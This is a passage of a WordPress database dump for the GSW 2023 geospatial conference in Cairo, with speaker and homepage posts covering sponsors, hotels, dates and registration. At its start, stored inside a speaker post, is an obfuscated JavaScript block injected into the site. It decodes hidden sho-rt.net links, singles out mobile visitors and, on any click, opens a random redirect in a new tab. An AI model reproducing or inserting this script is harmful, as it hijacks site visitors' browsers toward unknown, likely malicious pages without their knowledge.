_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Ruizhi Chen, Positioning Indoors Using Sound','','publish','closed','closed','','positioning-indoors-using-sound','','','2023-08-18 19:23:11','2023-08-18 19:23:11','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4583',0,'dt_team','',0),
(4584,1,'2023-05-27 02:05:00','2023-05-27 02:05:00','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h4 